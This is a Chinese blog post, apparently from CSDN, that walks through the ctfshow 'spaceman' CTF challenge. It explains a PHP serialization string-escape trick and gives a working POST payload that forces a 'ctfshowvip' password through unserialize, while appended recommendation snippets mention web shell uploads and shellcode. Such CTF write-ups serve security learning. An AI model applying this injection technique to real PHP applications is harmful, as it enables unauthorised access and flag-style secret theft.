ctfshow大吉大利杯 spaceman wp

最新推荐文章于 2024-07-22 18:03:31 发布
最新推荐文章于 2024-07-22 18:03:31 发布
阅读量178 收藏
点赞数 7
文章标签: php 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79131708/article/details/134667390
版权

ctfshow大吉大利杯 spaceman

小白第一次写文章,记录一下自己的做题心得,有误的地方还请大佬指正。

题目

<?php
error_reporting(0);
highlight_file(__FILE__);
class spaceman
{
    public $username;
    public $password;
    public function __construct($username,$password)
    {
        $this->username = $username;
        $this->password = $password;
    }
    public function __wakeup()
    {
        if($this->password==='ctfshowvip')
        {
            include("flag.php");
            echo $flag;    
        }
        else
        {
            echo 'wrong password';
        }
    }
}
function filter($string){
    return str_replace('ctfshowup','ctfshow',$string);
}
$str = file_get_contents("php://input");
if(preg_match('/\_|\.|\]|\[/is',$str)){            
    die("I am sorry but you have to leave.");
}else{
    extract($_POST);
}
$ser = filter(serialize(new spaceman($user_name,$pass_word)));
$test = unserialize($ser);
?>

wp:

题目比较简单,定义了一个类spaceman,里面两个属性 u s e r n a m e 和 username和 usernamepassword,_wakeup()函数里判断password=ctfshowvip,是则返回flag。

下面定义了一个过滤函数,将ctfshowup替换为ctfshow,

后面$str = file_get_contents(“php://input”);这一行读取post传参,并正则匹配,所以不能有_ . ] [,通过才能读取post传参,

可以看到需要通过post传参使得$pass_word=ctfshowvip,而又过滤了下划线,就需要绕过了

通过构造字符逃逸,绕过匹配

先随便传个username和password,进行序列化,得到

O:8:“spaceman”:2:{s:8:“username”;s:3:“xxx”;s:8:“password”;s:3:“xxx”;}

可以通过构造username的值进行字符减少,然后把需要的ctfshowvip构造在password里面。

每加一个ctfshowup,就减少两个字符,需要吞掉";s:8:“password”;s:xx:"这些23个字符,(注意,password的长度还未知,但大概判断一下应该是2位数,所以这里的xx是两位)可在后面再加一个变成24个字符然后在前面写12个ctfshowup。再在password里面构造剩下的结构,也就是

O:8:“spaceman”:2:{s:8:“username”;s:108:“ctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowup”;s:8:“password”;s:37:‘1";s:8:“password”;s:10:“ctfshowvip”;}’;}

过滤后就成了

O:8:“spaceman”:2:{s:8:“username”;s:108:“ctfshowctfshowctfshowctfshowctfshowctfshowctfshowctfshowctfshowctfshowctfshowctfshow";s:8:“password”;s:37:"1”;s:8:“password”;s:10:“ctfshowvip”;}";}

便可完成逃逸,最后post上传username和password即可。

这里有一个知识点,GET或POST方式传进去的变量名,会自动将空格 + . [ 转换为_,详见https://cloud.tencent.com/developer/tools/blog-entry?target=http%3A%2F%2Fca3.php.net%2Fmanual%2Fen%2Flanguage.variables.external.php%2381080

在这里插入图片描述

故post时将user_name和pass_word写成user name和pass word(或者加号 . ]都行),

payload

user+name=ctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowup&pass+word=1";s:8:"password";s:10:"ctfshowvip";}

注意:这里又犯了个错误,写user+name=ctfshow…时,后面字符串我加了双引号,结果就没回显了,这里不能加引号

非预期解:由于post时自动将+ . 空格 [ 等替换,可以直接post:pass+word=ctfshowvip,便得到flag
dz233_
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
PWN lotto [pwnable.kr]CTF writeup题解系列10
重新启程
01-02 795
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 下载文件,检查一下情况 root@mypwn:/ctf/work/pwnable.kr# ssh lotto@pwnable.kr -p2222 lotto@pwnable.kr's password: ____ __ __ ____ ____ ____ ...
BUUCTF刷题十一道(09)
qq_45837896的博客
09-26 437
蚁剑连接无法查看flag,发现是有disable_functions限制,使用蚁剑绕过disable_functions插件。session可控,修改session,长度为32位,session后缀改为.php(加上.php后为32位)这个可以开burp扫一下,或者用dirsearch扫一下,一些url会自动跳转index.php。变量,POST优先级高于$_GET,所以这里POST传GET相应变量没字母的。解析字符串时不会进行url解码,所以可以用url编码绕过,而。
CTF-综合测试(低难度)
不知名白帽的博客
05-30 834
CTF-综合测试(低难度),实验环境:kali(192.168.20.128),靶机(192.168.20.143)。进行信息探测,敏感信息收集,利用fuzz注入爆破密码,然后进行端口监听,制作shell.php,利用burpsuite绕过waf上传木马,运行php,拿到普通用户权限,在进行root提权...
CTFshow--DJBCTF(大吉大利) WEB--spaceman
volcano的博客
01-25 1076
师傅们出的MISC题做得有点上头,虽然最后也只做出来四题,web题也没来得及看。。。 源码: <?php error_reporting(0); highlight_file(__FILE__); class spaceman { public $username; public $password; public function __construct($username,$password) { $this->username = $use
CTFSHOW-大吉大利
打酱油的杯具的博客
02-01 1619
CTFSHOW-大吉大利 文章目录CTFSHOW-大吉大利十八般兵器请问大吉的签到是在这里签吗牛年大吉色图生成器 被血虐,又菜又无知,只做出了无脑的拼图(真-有手就行) 以下wp参考是Mumuzi大佬的wp,仅仅是做个复现,建议看大佬的原博客: https://blog.csdn.net/qq_42880719/article/details/113068933 十八般兵器 感谢@i_kei师傅供题 刀、枪、剑、戟、斧、钺、钩、叉、鞭、锏、锤、戈、镋、棍、槊、棒、矛、耙 hint1:JPHS hin
Spaceman.rar
01-03
Spaceman.rar》压缩包中的素材集合是一个丰富的多媒体资源库,主要围绕“太空人”这一主题展开。这个包包含了多种格式的图像和动画文件,适用于各种创意设计、媒体制作或者教育用途。以下是对各类型文件及其应用的...
SpaceMan文件去重
04-12
标题“SpaceMan文件去重”指的是一个专门针对Windows操作系统设计的工具,用于查找并管理重复文件。这个工具可能采用高效算法来对比文件内容,帮助用户识别和清理占用磁盘空间的重复文件,从而优化存储资源。 在...
SpaceMan-开源
05-01
SpaceMan开源项目详解】 SpaceMan是一款开源的文件和文件夹大小查看工具,它为用户提供了一个直观的方式来管理和了解计算机上各个文件及文件夹所占用的空间情况。在日常使用计算机时,我们经常需要清理磁盘空间,...
flutter_spaceman
04-01
Flutter2.0投射旋转太空人+蛛网效果前言奈何没有一款华为手表,作为一名合格的程序猿,当然要撸起袖子自己来画一个啦〜考虑到最近Flutter推出了2.0稳定版本,除了对移动端Android,iOS的支持外,Web端和桌面端的支持...
重复文件查找三剑客SpaceMan、 Jokul Duplicate Files Scanner 、Vistanita Duplicate Finder
03-05
重复文件查找三剑客:Jokul Duplicate Files Scanner 1.0.4585,SpaceMan 99 4.0,Vistanita Duplicate Finder 3.9.6。资源收集共享,如有侵权,请联系删除!
ctfshow 大吉大利
akxnxbshai的博客
12-08 787
复现一下。
CTFshow-大牛
i_kei的博客
01-22 1735
2021-1月23日大吉盛大开幕 比赛地址:https://ctf.show/challenges 比赛群号:372619038 无需报名:提前注册好账号即可 比赛态势直播间地址: https://live.bilibili.com/22405530
ctfshow-萌新(持续更新)
热门推荐
i_kei的博客
01-10 1万+
萌新认证 加入qq群:372619038 进群喊:萌新码 萌新_密码1 密文: 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 首先16进制转字符 发现一串base64编码的字符串,解密后得到栅栏加密的字符串 base64加密解密 栅栏解密后得到flag 萌新_密码2 出题人已累,随便敲了几下键盘。。。 rdcvbg 2qase3 6tgh
CTFshow DJBCTF MISC(大吉) WP
七月的博客
01-24 3354
只做了misc的菜鸡,来写写misc部分的writeup,狸神的FM到最后也看不懂,太难了呜呜呜。 十八般兵器 hint1:JPHS hint2:用Notepad++打开试试? hint3:前十种兵器对应10进制,后八种对应8进制 根据hint1,先利用JPHS将18张图片均解密一下,密码为空,每张图片解密后的数据末尾都有一段数字,这幅图是删掉了部分空格,实际需要往下拉。 根据题目的武器顺序,前十张图片的数字组合起来十进制转十六进制。后八张图片的数字组合起来八进制转十六进制,asc转码一下得到flag
大吉--ctf.show
doudoudedi
01-25 525
easyrop 简单栈溢出,将返回地址写成ROP然后在data段布置shellcode跳过去执行即可,我写了2段估计有大师傅分分钟秒解开 from pwn import * context.terminal=['tmux','splitw','-h'] #p=process("./easyrop") p=remote("111.231.70.44",28092) offset=64 context.arch='amd64' sl=asm(shellcraft.sh()) shellcode=''' pop
ctfshow大吉大利web wp
想变得强大,虽然现在还弱不禁风
01-26 640
这次的比赛web因为种种原因就做出两道。 不过也学到了东西。 有手就行 打开网页F12发现有这个东西,很明显是base64转图片,记得加上头 然后发现这么个东西 回看url 试一下?file=flag,又得到一串base64 得到一个小程序码,进去之后发现要点5700多万下。**加粗样式**发现鼠标连点器只能一秒100下,不现实。 网上搜了一下,发现微信小程序可以反编译。照着教程弄了一下,直接在反编译的文件里ctrl f 发现flag. spaceman 应该是非预期了 绕过下划线就行。 x
CTFshow——DJBCTF(比赛记录之摸鱼的代价)
Npceer-一位网安初学者的博客
01-24 758
目录:没有(因为没怎么打,总共就写了几题) 这大吉挺不错的 就是我不行 我的水平 由于摸鱼等原因 与2个月前的HECTF 几乎没有变化 虽然我以为会有变化的 我都不敢说我是个web入门的萌新 这veryphp这么多写出来的 我看到一堆waf直接跑路了 MISC 也是在各种hint下 才能勉强切出几题 属实太菜了 我3个月的门 入的不如别人半个月 这个博客为了监督自己不摸鱼而记 也顺便记一下这几题misc 因为挺好玩的 我的签到!:手撕拼图yyds 第一次 照着群里大佬给的原图去拼 然后感觉时间不够直
Vue3+ element plus 前后分离admin项目安装教程
luck332的专栏
07-21 594
前后分离admin项目安装基于 vue3.x + CompositionAPI + typescript + vite + element plus + vue-router-next + pinia,适配手机、平板、pc 的后台开源免费模板,希望减少工作量,帮助大家实现快速开发。
PHP小课堂】PHP中的数组函数学习(一)
最新发布
硬核项目经理
07-22 838
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值